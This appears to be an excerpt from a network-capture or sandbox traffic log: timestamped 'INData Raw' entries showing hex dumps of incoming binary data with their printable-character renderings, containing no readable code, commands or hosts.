                                                                                                                                  2022-01-11 22:39:11 UTC5686INData Raw: 70 30 27 2a 8d a0 94 db 6f 0c 9c 17 dd ff 59 d1 08 46 6b 86 a8 2e 92 bf 61 d2 cf 41 dd cb dc 18 e5 66 72 0a 4a 5c e5 7e 05 29 ac 94 0c c6 76 fe b0 00 ba 5b 88 6f de 73 a2 3e ab dc e3 e4 3c c7 ec 4f d5 70 91 a0 88 3b 70 3f 4c 1d fc 8b 92 07 4d d2 25 fc 82 ab e0 7d 3d 33 bd fb b8 56 38 a2 fe 8d 2d f7 79 b4 b1 dd 18 6c 94 97 62 99 e0 b4 97 5b f1 ad 56 7c dd fd 46 27 31 9f 8f d2 3a d6 69 61 4b 8a 68 df 93 16 42 b6 5a 61 d0 2a e2 46 02 79 ca a2 32 ef 7b f9 41 a9 60 d6 ce 8a 68 84 05 09 5c e9 75 31 6c c3 ba 8f 45 1f b0 e0 7a a9 98 eb b1 a7 c4 e5 45 b8 f2 ed a3 d0 e7 08 3a 63 02 62 91 3e 68 75 d6 5f 73 55 3f b9 34 38 2b 49 26 33 6b 9e 51 04 59 a5 6b 15 0a ce 49 cb 5d 99 02 7b 2b 64 32 3d 6a 4e 47 bf dc 16 96 ea 4e b4 a4 7f 81 29 e7 e3 1b 18 ee 3d 1d 6a ba 8c 52
                                                                                                                                  Data Ascii: p0'*oYFk.aAfrJ\~)v[os><Op;p?LM%}=3V8-ylb[V|F'1:iaKhBZa*Fy2{A`h\u1lEzE:cb>hu_sU?48+I&3kQYkI]{+d2=jNGN)=jR
                                                                                                                                  2022-01-11 22:39:11 UTC5702INData Raw: 03 e1 ba 8b 91 00 2e 89 ed 94 20 8a 40 e8 4a 2c 18 ec 5e 65 5b 36 99 a1 70 9c a9 4e a6 38 4e 85 5d fc ea fc 46 25 d9 a5 43 f0 bf f9 14 38 4e 7d 2a cb 14 fd 30 61 73 60 53 f8 1b 4b 2b 7d 4e 2f 1d d0 11 34 ec 96 5a f0 cc 02 0c 7d 4f 61 e8 16 37 da 07 2c 0e 8e 74 95 95 b3 a4 bb f8 f6 c8 76 f3 37 86 c7 36 e7 81 f7 9d 2d 09 0b a0 16 e9 f7 ac 71 2f 9f cc 91 c8 dd 84 17 1f 58 23 75 80 54 cb 0c e4 4c 08 f1 04 34 26 56 26 31 92 e2 45 df ae 23 30 78 37 d1 93 fe 68 db b8 2a 4b 1e 42 14 b2 ca 18 eb b9 3d af 47 5a 59 14 ac f4 1d ca 1d 60 a4 25 0c a5 7d 12 3d f3 9e 4d 14 a8 7e 9d ee 55 48 7c f8 9a 61 bc 75 16 5e d9 10 5d 66 6f c9 27 b0 d0 34 8b 9d 8b b6 a6 98 e2 e1 ac c7 c3 af ae 5b 58 b0 57 05 53 ad ee 7e e0 2f 9c 1d a7 a3 6b ec 94 ab 6b ae ad c6 00 48 ec 05 f3 79 e1
                                                                                                                                  Data Ascii: . @J,^e[6pN8N]F%C8N}*0as`SK+}N/4Z}Oa7,tv76-q/X#uTL4&V&1E#0x7h*KB=GZY`%}=M~UH|au^]fo'4[XWS~/kkHy
                                                                                                                                  2022-01-11 22:39:11 UTC5718INData Raw: fd 37 68 bb 1f 86 54 35 14 9b 3a 38 98 eb d4 17 f1 09 ec 2f 11 e4 f9 e4 ec 60 a3 a4 8d ce f9 8c b1 30 97 72 8a 32 60 b6 29 1e 25 fb 66 22 3a bb 54 4a a7 c4 50 7d 96 cb 4a 67 78 42 12 02 49 07 88 47 d6 8b 6b a4 95 94 80 99 6e 0f d3 1c 6d 16 af 6f 6a 01 66 84 5c bb d8 a3 32 31 d6 69 61 f8 37 3b a8 9b e3 d9 85 77 7d 23 39 de 67 a6 aa a0 86 54 39 3b f3 68 49 41 77 77 f9 33 a9 ac a7 19 d6 06 52 06 bd da 25 9b 02 ad b8 c9 a5 47 82 33 95 5f d3 e3 30 07 84 c2 00 41 4b 86 39 65 d1 60 95 d8 53 d0 0b ed 6d 72 65 82 b4 91 d8 81 b0 ef 25 8e 08 e1 7e e3 2d 35 8f 6a 96 ed c2 cd 92 3f 97 a5 55 76 83 87 eb d8 c9 df e6 6f a2 d5 13 7d df 71 25 2a f4 66 a6 0c 07 62 1b 0e 59 01 68 06 5d b9 ab 54 e1 1d ca ef 8d cf ad 9a fe 16 97 05 ca 72 a2 df 94 40 a0 3b 78 46 ea 1f 25 99 45
                                                                                                                                  Data Ascii: 7hT5:8/`0r2`)%f":TJP}JgxBIGknmojf\21ia7;w}#9gT9;hIAww3R%G3_0AK9e`Smre%~-5j?Uvo}q%*fbYh]Tr@;xF%E
                                                                                                                                  2022-01-11 22:39:11 UTC5734INData Raw: 24 5a 54 0b 8b eb 89 ff db b6 84 5b 8c d1 52 77 ce f0 00 e8 6b 30 ef 27 f3 59 7f 59 08 33 87 7c 20 6b d0 18 d7 bc 61 b9 81 e0 4d 30 b4 14 65 f5 0d 38 27 1c 04 9c d4 2a 59 05 3d 3a 84 d1 e4 5a 5a 32 53 b7 cd 8f 38 a4 5e 73 fc 57 89 ac 3a 4f 70 44 33 0f da 31 a2 cb 45 8f cf eb 36 5f d0 f5 d4 a0 6e c9 31 24 7b 6d 4b 40 50 4b c8 05 34 33 d9 b8 88 7d 28 c3 3f f7 f9 0c b9 20 05 5f d3 91 b0 c9 e7 cb 41 fe 98 56 05 b5 19 5f 30 d9 eb f8 3c 2a 7c 30 68 74 27 75 65 11 41 22 e3 61 51 57 27 b7 70 66 23 a9 63 ec 16 51 11 92 8b a5 6d 1f 65 48 d2 d9 2b 76 fc 64 cc e3 00 fc 38 5f cd 84 8d fe 89 16 bc 29 1a 86 61 bf 51 87 ff f3 13 7e 15 b1 fb 6b 45 3c cd 63 71 8a 7f 68 0e e4 6a f3 f8 46 cc 81 e6 65 13 f8 fa f5 95 64 b2 35 ab 1d 31 e2 22 22 d9 23 07 80 c8 f9 d4 26 b3 52 86
                                                                                                                                  Data Ascii: $ZT[Rwk0'YY3| kaM0e8'*Y=:ZZ2S8^sW:OpD31E6_n1${mK@PK43}(? _AV_0<*|0ht'ueA"aQW'pf#cQmeH+vd8_)aQ~kE<cqhjFed51""#&R
                                                                                                                                  2022-01-11 22:39:11 UTC5750INData Raw: c7 d9 aa 1d 80 0d 40 7d 55 4e a0 fa 3f f0 eb c6 9b bd dd 1f 76 71 2e 4e bf 59 75 67 fb fe ee 8a 18 7c bf 9c 10 e2 cd da f6 16 b0 a3 63 76 ef 99 15 5e 72 ed a3 fc 38 87 2b 67 4e 5a 30 01 94 46 b8 0b 45 35 19 42 a9 83 54 31 c6 68 3b 55 08 02 a3 6d ba b9 ea b4 69 fc d0 c1 06 9e c7 92 73 81 92 62 da c5 2c 5a c9 6a 9c b0 c8 44 40 db f0 d7 2d 2d f0 dc cd 06 5d 4c 87 1d 96 fb aa 81 a9 4f cd 05 94 b8 1e c7 56 01 71 7a 60 8a 5a 3f 14 3b c4 d6 14 1a 0f 8c 24 62 71 19 78 90 9d 53 5c 1f 5e b8 3c b1 73 f8 c9 79 25 78 24 6e b4 22 a8 8a fc a5 59 ea 43 22 16 e1 e7 28 9e 3e 65 f2 14 fe 20 b7 6b 1b 80 93 03 f1 56 50 e0 92 62 08 0b 2d 2a f7 34 03 d2 10 e5 3c ae 7e ac 2d e5 e4 0f 65 2d df 0b 73 9e 20 07 0e fb d5 a8 29 a6 85 30 35 a0 ac 7f 83 f0 e2 55 c9 e2 1c 22 52 bd 0e 87
                                                                                                                                  Data Ascii: @}UN?vq.NYug|cv^r8+gNZ0FE5BT1h;Umisb,ZjD@--]LOVqz`Z?;$bqxS\^<sy%x$n"YC"(>e kVPb-*4<~-e-s )05U"R
                                                                                                                                  2022-01-11 22:39:11 UTC5766INData Raw: df 02 92 b5 9c dd ff b0 21 3a 10 9c ad e2 94 9f 2e ee c3 34 8c 9e 83 e5 aa cd 2f fe 2c 22 eb 86 f5 4e 55 50 91 e8 81 67 d8 cd 23 e4 00 04 9e d9 f7 13 34 49 e2 de 76 87 cb 56 d2 30 f8 3f 2a 09 5e b9 e9 be ff 2b 4d e9 3f cc 77 c5 5f 9c 20 b5 97 21 60 f5 c8 62 fc 76 b7 af bd 2c 0d 71 1c 3e ca 29 79 d6 b4 eb bd 0a f3 4e f5 a2 3c 99 f2 9e c0 3a 66 6d 16 27 7a bb 5f 44 8d 2f 89 0b 63 15 12 19 b1 4a 25 d0 39 2d 85 54 af 61 09 0a 16 aa 68 87 4a 05 f3 67 2f a7 27 d1 53 a3 05 90 fc 02 4f d4 ed d2 b9 2e 7c 72 e6 76 99 b7 81 63 c7 3e f5 8c 86 6e 21 f6 71 6b f2 31 49 a7 c3 b7 4b f1 12 f2 87 da d2 11 7d c2 a8 ee 9a 71 a8 3d a9 f2 8f c4 49 51 1c 9f 01 90 c4 3b 6a 6c d5 56 45 03 45 c0 79 29 b3 20 fd d5 3e e5 d1 37 11 37 b9 c1 87 50 9f 4a 89 f8 33 51 1c 56 cb 5b 27 ef ea
                                                                                                                                  Data Ascii: !:.4/,"NUPg#4IvV0?*^+M?w_ !`bv,q>)yN<:fm'z_D/cJ%9-TahJg/'SO.|rvc>n!qk1IK}q=IQ;jlVEEy) >77PJ3QV['
                                                                                                                                  2022-01-11 22:39:11 UTC5782INData Raw: 26 92 56 42 2d f0 43 55 bd 78 37 1b 12 42 24 fb 9a a1 16 0a f6 c5 7b 87 17 d9 10 0d bf a2 c4 f2 f1 3f 74 6c df 31 ad 03 af a8 a5 0e 1a 71 5d 67 4c 6e c4 2d fc bb 60 c3 93 67 f5 38 d4 5c d3 7e 5b 3b 3c da b0 9e a8 1d 76 b8 a1 30 62 84 d6 26 40 24 31 df e0 4b 42 f0 4f 0f 4c 7f c3 a4 ff 8b 4d 6d 67 36 1c e1 e7 44 84 4b 49 ce 4d 46 2b c3 a4 95 64 f7 7c 18 ef 90 2d 62 ad 9f e7 83 fc 70 f2 b7 f7 c9 12 e2 24 7a 39 78 b3 d9 39 c9 b6 df c8 cc 62 1f aa 7b 01 ad 68 90 04 4f 12 cd 63 a9 59 f7 46 b6 a7 0a ea 5c 84 80 26 b9 25 93 26 a0 66 54 0c 56 52 a2 b8 38 de f8 9d fa 8c 8d 6f 9b e9 68 13 77 98 30 9c 74 fe b2 e6 72 f8 96 66 44 28 35 42 2d b8 26 ee 9b 49 2c e4 8d 5d 3b 6c e1 10 8e 07 56 fd d8 71 6e 97 5e 54 09 25 f7 f0 e9 44 70 4f c9 ac 11 49 57 74 7c 17 4b e1 21 67
                                                                                                                                  Data Ascii: &VB-CUx7B${?tl1q]gLn-`g8\~[;<v0b&@$1KBOLMmg6DKIMF+d|-bp$z9x9b{hOcYF\&%&fTVR8ohw0trfD(5B-&I,];lVqn^T%DpOIWt|K!g
                                                                                                                                  2022-01-11 22:39:11 UTC5798INData Raw: 81 fe e2 77 d4 70 25 eb 18 44 6d dc 3e 57 40 f4 01 31 93 2e 01 a6 ee 8d dd 00 7a 4d 22 86 02 ed 6a 36 35 91 0f 16 49 7b f4 b3 47 7a 9a 56 3d e2 a0 d8 13 b4 b8 e2 5e 3a 33 9f 11 45 68 b8 01 d0 49 dd d3 87 c5 bb 4f 7d f5 83 f5 a3 12 e3 7b e4 62 b9 1e f9 5d 0d 56 ce 49 4d 67 da 7e 9f 3d 0a ef 26 87 84 95 69 5d 43 32 3a 0c ea bb 46 b4 96 96 a1 cb 07 0b bc ce 46 e6 3c 9f 34 5b 81 c0 0c 41 5d 81 70 57 c8 1c 88 bd 0b 54 82 8f 5a 48 31 9b 0b 1e e7 93 24 7d ba 18 3e 17 a4 11 a9 8c 7d f2 d7 c1 d4 c3 78 bf 7c 9b 3b 15 2c 60 a2 61 97 e3 33 87 c6 8e fa 8c 3d 51 7c e8 a8 87 cd 1d b3 2a 4d 8d 19 ec bd c5 62 39 54 f6 b1 7e f3 55 d1 c4 1e a8 bd b4 16 bc 62 df 52 b9 60 55 ae 15 6f 25 56 9b 50 65 7c 72 18 8d f3 71 23 42 c5 84 d1 28 e4 e3 72 87 e9 f1 d0 1d 05 ee 60 72 47 c4
                                                                                                                                  Data Ascii: wp%Dm>W@1.zM"j65I{GzV=^:3EhIO}{b]VIMg~=&i]C2:FF<4[A]pWTZH1$}>}x|;,`a3=Q|*Mb9T~UbR`Uo%VPe|rq#B(r`rG
                                                                                                                                  2022-01-11 22:39:11 UTC5814INData Raw: 50 94 83 f1 80 bb 68 74 8a 0a 7d ac 14 7d 5a d5 67 0a bc ef ce 3a 8b 96 2b 43 3b a9 1e 2f 35 62 8a 83 e5 77 8a a7 5e 9b a5 13 1e 37 07 5c 4b 75 c0 30 8e 07 eb e5 17 75 fe 4b bf db 38 e0 b7 22 e5 ba fd 0c fb 9b 76 65 13 6b 5d 78 0e 06 a2 ff ec 2e 35 61 3c af 5f a0 60 4c 8d 7b 88 4b 59 f4 a5 b0 77 5d 39 44 e5 ac ee ab 37 54 e5 87 2c d3 e9 9d 49 ef 09 87 39 40 fd a3 ee be 9b 04 38 fa 83 f6 68 f5 66 38 a0 96 30 d7 66 ef e8 35 8c b7 dc 7c 73 c2 d4 b4 24 a6 87 c8 d9 42 a6 1d 09 d7 b0 25 e6 ce 95 0e 19 38 07 93 8d 4f 15 21 72 85 88 67 14 9d 19 8f 31 9a 7a 6d 2a be 57 96 d8 30 03 e4 35 c2 ee 04 cc 8e d9 25 bf 2c 4c ad a2 df 63 09 76 a0 51 82 2b d6 a8 1f 59 cc 23 51 68 77 e6 5f 6d 2a 9a 6f 7a 98 80 63 b1 6c f8 36 6f 43 22 1a f5 e9 ff 44 e9 a5 0f 67 1a 4c 55 66 f5
                                                                                                                                  Data Ascii: Pht}}Zg:+C;/5bw^7\Ku0uK8"vek]x.5a<_`L{KYw]9D7T,I9@8hf80f5|s$B%8O!rg1zm*W05%,LcvQ+Y#Qhw_m*ozcl6oC"DgLUf
                                                                                                                                  2022-01-11 22:39:11 UTC5830INData Raw: 50 5a 85 ba d3 ef cf 9d 52 6d a8 2a ca 6a 36 de 76 15 4b 1d 25 52 45 2a 87 4f 9b 02 53 ee a9 5d a8 b2 f2 fe 64 26 6d 41 cd 5d 9d 1e ab ed e0 0c 82 93 77 c8 12 30 27 b9 a6 61 51 34 04 2c 6e 7c 67 42 77 1e 56 bb e0 8c 70 28 6f 54 e2 6f f9 6f 59 d3 b6 88 f5 a5 f7 db 2b b5 ce 92 66 c9 34 7b 56 ff 52 37 87 84 f0 45 af 3f b9 0f 5b 92 80 15 cc a3 9e e3 38 4a 90 d4 8d dc 9a a5 d9 30 8c 41 0a 98 1a 40 c6 42 18 e2 20 75 a8 c1 0d d3 6b 66 53 ba fc 5d 9f 20 a5 13 e3 68 af 22 56 56 3c 1a 43 ad 94 04 15 9e a8 77 ae 2b 01 10 7a ac 35 f4 74 70 1d de 66 1c 9c af 93 0e f3 3b 3e 90 7c 5a b3 cb 45 ec e2 f6 c0 56 e4 24 68 44 e5 a1 b4 ef f9 50 d9 35 42 63 6c 92 db c8 22 18 43 e0 b7 b8 c7 63 fd b6 6a e8 b7 b4 63 47 11 35 6a fa b8 e7 52 1d 2b ce 85 92 6f 69 e0 77 8a c2 e9 c0 7d
                                                                                                                                  Data Ascii: PZRm*j6vK%RE*OS]d&mA]w0'aQ4,n|gBwVp(oTooY+f4{VR7E?[8J0A@B ukfS] h"VV<Cw+z5tpf;>|ZEV$hDP5Bcl"CcjcG5jR+oiw}
                                                                                                                                  2022-01-11 22:39:11 UTC5846INData Raw: d1 39 97 39 ee 06 e8 2e df 93 d5 8d 04 70 a9 17 77 60 d9 41 b8 30 e8 9c 32 66 65 a2 34 a8 c5 0e 92 be 49 02 7b 5c 57 e8 e2 ce c4 b5 7e 85 64 ec e2 5d 25 ef c0 25 1b 21 1d 2f a5 a5 fe e5 3c a0 dc 6b 37 c9 63 29 89 3c 5a a4 28 5a ec 49 56 ab 2f 01 bc b6 59 7f dc 5f 01 49 ee 80 1e c3 a7 b9 2c 95 6e 6e 38 6a 94 67 5c 03 f2 ca d2 b8 96 d8 f2 17 35 d2 29 d6 e0 bb b9 80 fd 50 a7 31 1d 90 5b 00 11 8a 54 ef 75 9c d0 63 c2 c3 f7 47 45 36 f4 ee ff a8 6b 5c 26 a4 74 b1 0e 4c 0b 58 43 91 7c dc b7 bc 75 e7 2a fa 9b b3 d7 64 c9 3d 2a af f8 e1 70 03 85 aa 84 14 61 13 53 d4 55 0e d8 9f 0f 36 04 7c 1d 83 e8 fa 57 cc b2 2c 5b f5 de fd 14 6d 6b dd f7 5c c4 95 86 f6 00 cb 99 9c ab af 00 2e 09 34 94 97 69 7c 86 84 c6 79 31 71 ae 2e 60 3e 6d 2b a4 29 cf b2 14 ca be 45 ef ba ee
                                                                                                                                  Data Ascii: 99.pw`A02fe4I{\W~d]%%!/<k7c)<Z(ZIV/Y_I,nn8jg\5)P1[TucGE6k\&tLXC|u*d=*paSU6|W,[mk\.4i|y1q.`>m+)E
                                                                                                                                  2022-01-11 22:39:11 UTC5862INData Raw: 63 b6 3a 30 04 0e 58 ab 8e 28 d7 81 23 2b bf 39 b6 fd 83 73 bd 85 77 74 97 52 d2 ee 8e 4d 01 70 2d 95 a0 41 e1 f6 4d 12 22 bc 3a 32 25 f4 21 7e d2 ae f3 00 a0 bb 5f 9d 83 75 dd ca 35 0a 0f 3c 93 26 6a da 75 3f f8 4b 49 f5 91 3d 41 b6 1d a6 d2 b3 aa 7e 31 3e 37 bc 88 62 36 e2 9e 03 67 e2 5b 6b 6c 20 c4 f3 1e 7d bc d8 39 f3 46 f4 08 68 b3 b1 f8 b8 8e 0d e5 1f 35 32 94 16 53 2f 5a 64 6a c5 37 1d 46 b1 f4 1f e5 54 91 2b ee e1 f1 b3 94 64 50 89 e4 c1 52 18 a3 50 15 5b f0 0f 7a 84 7e e6 2d b9 08 6f 90 09 c5 76 d7 c2 05 f5 9a ba 40 c7 21 bb ea 41 e7 33 4e e4 5b 77 7d ef 80 bd bd 8e 6e b9 72 28 8e 23 52 4e 38 9d 2a 1f 1b bb 08 d4 2b 2b bc 5c cf 81 65 92 eb cb 1f d1 64 6b c7 a8 61 da 6c b2 f0 c1 9a af 6d e7 be cb 32 d7 9c 78 98 72 f8 4c d6 1b 19 10 7e 2c fc bc 21
                                                                                                                                  Data Ascii: c:0X(#+9swtRMp-AM":2%!~_u5<&ju?KI=A~1>7b6g[kl }9Fh52S/Zdj7FT+dPRP[z~-ov@!A3N[w}nr(#RN8*++\edkalm2xrL~,!
                                                                                                                                  2022-01-11 22:39:11 UTC5878INData Raw: 87 9f ae 15 71 f6 81 b2 af 59 fc 80 78 ae a4 1c 96 97 5e 3a 6a 01 5b 8a 87 6f dd c4 44 20 7d c4 b4 0f 0d 47 f5 22 94 1e 30 97 5d 96 6e bf 19 ca e6 c7 75 dc 47 60 33 c4 bf 12 81 3a 79 66 5f 92 de f0 d0 39 44 c4 0f e1 9c 88 b1 77 34 dd 13 03 48 91 44 5e 02 fe e2 4d 4b e6 44 77 55 1c 25 c6 8d 34 fe d2 3e 3f 97 1d 3b e0 7d f3 8b 62 6e 04 54 dc de e1 ee 49 ba 91 cc f7 9c d1 14 3f aa fe a2 ee eb d2 ce f9 c4 8a 04 f0 34 3f c5 fa 99 08 cb 66 6b ec ec 8c 5b c1 30 d6 fb bc cb ee 78 6e 6c e1 c2 f8 1d df f7 d1 17 60 ba 89 55 eb 96 b2 87 a2 73 97 44 2d 75 22 5e 5d 4d 91 7a a7 50 a5 b4 11 e0 32 96 41 e1 17 54 bd df 6b af 6e df 68 2b db d1 dc e5 f4 65 32 ae 21 d6 35 b7 32 8b 96 f2 b4 6e ac 94 d3 83 36 45 ce 25 dd c5 ae 15 aa b0 d3 75 b8 a4 75 2a 69 c9 cb 3c 28 57 ea 2a
                                                                                                                                  Data Ascii: qYx^:j[oD }G"0]nuG`3:yf_9Dw4HD^MKDwU%4>?;}bnTI?4?fk[0xnl`UsD-u"^]MzP2ATknh+e2!52n6E%uu*i<(W*
                                                                                                                                  2022-01-11 22:39:11 UTC5894INData Raw: fa 86 da e6 c0 92 26 02 e7 83 67 e7 43 6e 72 f9 65 68 07 b1 b3 c0 41 53 96 2b 83 3b 99 19 78 27 b0 45 fe e2 26 27 14 4d 18 8c 80 09 76 51 46 62 1e a5 be 10 1b 63 55 c0 30 f5 c7 2c 91 3f f0 28 3d da 79 35 10 4e bb 5f c6 94 f1 54 95 5c aa 47 da 59 28 9f a6 a3 8f e9 91 c3 4a 8b de a9 c6 8c 26 e3 32 87 16 ff 79 b8 c1 e4 f5 4e 57 9b 61 41 d4 bd 0a 15 47 9d d6 e2 94 3a 48 18 5e c6 fa e8 91 8e a5 ee cf 22 62 09 69 14 ae bf 15 56 24 da 41 4a 8a 6b 65 9e f4 5e 65 e0 a0 c0 9b 13 85 78 e8 93 2e 6e db 00 c1 22 6e e5 65 bd 90 75 a9 3d a8 c3 fd 05 de 9b ad 08 92 41 f4 f0 64 4e d9 d5 cb 60 bd 2b 88 52 fd 28 b7 ec ba ea a4 15 75 63 d8 33 20 d7 09 7c 49 b5 01 1c 7a 99 01 73 72 1e f3 01 33 49 c5 9c d4 80 7e b6 52 2a 85 b0 62 ff 1c bc 3e 78 4f 22 07 3b 18 4f 9e e1 51 a3 e3
                                                                                                                                  Data Ascii: &gCnrehAS+;x'E&'MvQFbcU0,?(=y5N_T\GY(J&2yNWaAG:H^"biV$AJke^ex.n"neu=AdN`+R(uc3 |Izsr3I~R*b>xO";OQ
                                                                                                                                  2022-01-11 22:39:11 UTC5910INData Raw: a9 d7 18 b9 d5 a3 a8 55 bb 78 64 50 b2 05 2a 0d cc 8d ec 20 8d 37 61 40 2e 48 cd 7f 2b 86 2c 0f 37 18 65 fb 6a 31 bd 75 41 4c 5a b8 41 37 47 d2 43 d9 16 e0 1b 44 36 79 02 04 12 34 84 66 01 1c f9 fd a1 6a 5e b2 93 20 d7 fb ca 53 01 77 ab 73 2c b5 18 a9 88 d2 ea 8d 53 3f 3a f5 74 a4 e7 9b 37 9d 89 12 96 41 11 0b f9 c6 a1 34 34 d0 b6 bf a4 6e 53 5f ce 3d 09 57 ad 25 93 6c 60 8e be bd 68 6d ea 57 7d 2c 51 06 aa 8a ab 21 36 9a ee f0 12 cf be be 23 6c 49 e5 8d 8e 8a 17 1c 15 15 80 0d e3 87 9a e5 5b f6 0c 63 fb b1 79 6e 2a 43 0e b9 5a 1a 9b c5 12 d0 8a eb 1e b4 35 c1 6b 68 1a 15 67 da c1 65 e8 01 f3 13 87 44 d8 7d ca 03 97 71 fa 7e 26 1c 76 0f 79 78 db 0a 33 86 e6 8c c5 b7 27 83 c6 9c 35 aa fe ae d1 74 5c d9 bf 28 da 40 b4 7b 80 ac 98 e6 18 57 4c 1b 89 dc 0d 93
                                                                                                                                  Data Ascii: UxdP* 7a@.H+,7ej1uALZA7GCD6y4fj^ Sws,S?:t7A44nS_=W%l`hmW},Q!6#lI[cyn*CZ5khgeD}q~&vyx3'5t\(@{WL
                                                                                                                                  2022-01-11 22:39:11 UTC5926INData Raw: ce df 99 0a 56 7c ba de bb ee ad 08 c4 1f c3 11 2f 71 09 7f d2 64 d3 2d 2e 7e 26 6c 1f 9e 7f 9d d1 b8 cc e5 e1 7d 5a ef 27 32 df e7 b4 8e 31 ee 08 bd 6d aa 54 b2 fe 9a d4 c4 ad 52 72 c2 17 36 35 dc 33 c4 de 7a 5d 4b e8 66 7d 94 6c e7 b1 af d2 c6 72 1d 15 50 e3 bc ea 07 48 9c 2b 23 06 9e 3a 47 e8 2a b9 53 27 30 39 66 00 59 bd f7 cf 84 8e ef 09 76 a3 a5 e0 6e da 49 9d a0 d9 04 85 6e ed 80 81 0b 35 6a 96 3a df 0e dc 28 ed 64 05 90 87 37 89 7e 35 fb a3 e5 f6 14 02 03 5a 49 de 89 d6 26 95 c8 36 ac f1 6e 33 69 f3 2d 9e d2 5a 91 8c 3d 6a 5c d9 ab 68 6b 34 b8 4f e7 e3 f0 9f e1 69 7b 37 e6 05 8f 99 4f 9b 3b 84 35 af d7 6e 33 d1 5d 8f cf 41 bd 03 8c 77 69 3d 1f 1a b8 47 e3 71 17 a4 44 9d ab fb 93 7f a6 c8 c4 07 f5 22 49 de c8 86 19 f9 cd 45 15 f2 72 c4 e9 b7 e5 c1
                                                                                                                                  Data Ascii: V|/qd-.~&l}Z'21mTRr653z]Kf}lrPH+#:G*S'09fYvnIn5j:(d7~5ZI&6n3i-Z=j\hk4Oi{7O;5n3]Awi=GqD"IEr
                                                                                                                                  2022-01-11 22:39:11 UTC5942INData Raw: 35 50 82 7d b2 df d5 c0 aa 03 5c 39 33 aa 44 2e 42 64 61 ec 5c f8 17 88 4b 21 de 4b de 47 4b a9 ba 5f 59 bf 2b 3c 0d e7 85 12 b5 4c 64 85 79 3a f0 c7 aa 6b 25 a3 fd 22 69 92 1d a4 0d 1f 15 9d 5e a6 a1 84 79 a8 46 a2 4f 5c ff de a7 c6 76 4d 5d 4d d3 38 1f f7 c8 76 69 07 3e d5 0f 60 63 45 e8 7d 6c ce 6b c9 5a f3 a7 4c 47 95 32 45 d1 8c c9 96 2b bb 13 e9 1a c2 aa 7e 31 b8 f2 47 d9 5d b5 41 73 0d be c6 e0 89 4b fe 14 8e 85 7f 23 63 75 3b 91 85 ed 2f 06 34 49 8f a8 18 2b a3 bc a2 7d 48 a7 fd f0 b2 8f 48 c1 e7 29 da 38 cf 1f 5b b3 31 10 4d 78 a2 2d 68 cb 00 39 12 f3 c5 3a b0 5d 7c 92 76 ec f6 bd 4d 6b 84 4b f6 09 78 24 a0 86 83 9f c1 0e 24 f2 d2 e0 9b 34 54 a9 b1 a5 f1 22 bf e9 cf bc c1 48 fa 09 ce de 74 9c 3b 68 40 b8 44 c3 cc 41 d3 c9 48 f5 32 33 56 f1 8d b3
                                                                                                                                  Data Ascii: 5P}\93D.Bda\K!KGK_Y+<Ldy:k%"i^yFO\vM]M8vi>`cE}lkZLG2E+~1G]AsK#cu;/4I+}HH)8[1Mx-h9:]|vMkKx$$4T"Ht;h@DAH23V
                                                                                                                                  2022-01-11 22:39:11 UTC5958INData Raw: 11 6a 4f 51 9a 7e ae 4a 37 55 f4 98 26 a4 30 3a f6 f8 a4 ba c5 64 cc a2 33 2a 04 09 b2 d0 11 fc 66 48 1d 96 b6 a9 66 54 c3 7c 98 f5 6d 19 0a 42 a3 ff be 65 59 23 02 1d 17 b7 3c 7b ff 1e 82 97 c1 28 b5 92 a3 58 16 23 02 b9 03 b3 2b 61 65 9f 15 ed 5d 3c d2 f3 9a 4c 04 52 4d de e1 ac 5b be 41 79 82 70 b3 a9 44 23 b7 c1 46 bb 88 90 16 c5 07 ea e3 40 cf 23 c4 81 7d 54 a8 66 60 0c 7b 15 13 fd a1 c2 2b 5b 90 64 24 f2 a8 f4 8c 99 01 cf f4 aa 30 0c 89 25 6d f6 de a2 ee f5 5d 83 ed 88 95 80 dd d5 82 f8 4a e3 16 4b 09 66 83 b2 fe 5a cf ca 37 14 e3 89 f6 a7 b5 80 35 f9 1a 4d f4 91 eb e1 b7 17 b9 78 7a 6e 73 4f 8e 40 6f 1e a7 4a 63 12 44 e2 38 bb 2f 14 d5 39 db 3a 4c 40 c2 5c e6 79 6d 83 cf d1 fc 37 ea d1 42 9a 5f b3 d0 0d bb 77 98 39 4c 93 d8 0b b1 f6 f1 ac 9e b4 67
                                                                                                                                  Data Ascii: jOQ~J7U&0:d3*fHfT|mBeY#<{(X#+ae]<LRM[AypD#F@#}Tf`{+[d$0%m]JKfZ75MxznsO@oJcD8/9:L@\ym7B_w9Lg
                                                                                                                                  2022-01-11 22:39:11 UTC5974INData Raw: c2 d3 80 30 af a2 fa fe af 4c 79 9d 4e a6 3f 5e a8 e5 b4 82 0a 04 ce 7f fd ae a0 05 ea 09 8b 72 18 89 03 a4 24 4e 21 90 3c 0f cd 19 13 80 02 ff 02 5a 87 ea 3f 70 a6 40 18 2b 1e 49 b2 aa d9 52 09 e0 e9 1b 40 a8 46 80 54 2d 19 04 6e 2b c5 37 58 46 a2 cb 0f 54 b4 40 8e 49 ca 1a 7e 5c 98 31 aa 0f f4 36 0c e8 a3 f6 2e 44 70 41 e7 6f e0 4d bb 9c 37 dd 1a fa 3b 8e 8e 17 87 5f 9e 81 4e 7f b4 43 30 98 f3 1a 00 f3 07 61 4a 91 97 f2 6c 6d 0b 77 f4 14 bb a0 9f 18 96 e8 36 2a a8 4f 51 dc 36 43 7b fe d9 83 10 52 28 c6 de ac 5f 8d 87 c7 4a d6 00 05 22 bc 7f 49 ba 97 f7 a9 47 98 af 4b 33 73 08 0e 79 64 40 c5 4e ba 16 9f e3 db 29 04 76 7f 7c 92 a5 b5 6f 8c 65 da c1 90 45 86 b2 79 ba 9c 8a 5e f2 29 93 77 78 93 9b 60 27 90 0a 60 a6 88 32 cd 9c a5 fb 8e 24 c6 6f 79 d9 d4 a6
                                                                                                                                  Data Ascii: 0LyN?^r$N!<Z?p@+IR@FT-n+7XFT@I~\16.DpAoM7;_NC0aJlmw6*OQ6C{R(_J"IGK3syd@N)v|oeEy^)wx`'`2$oy
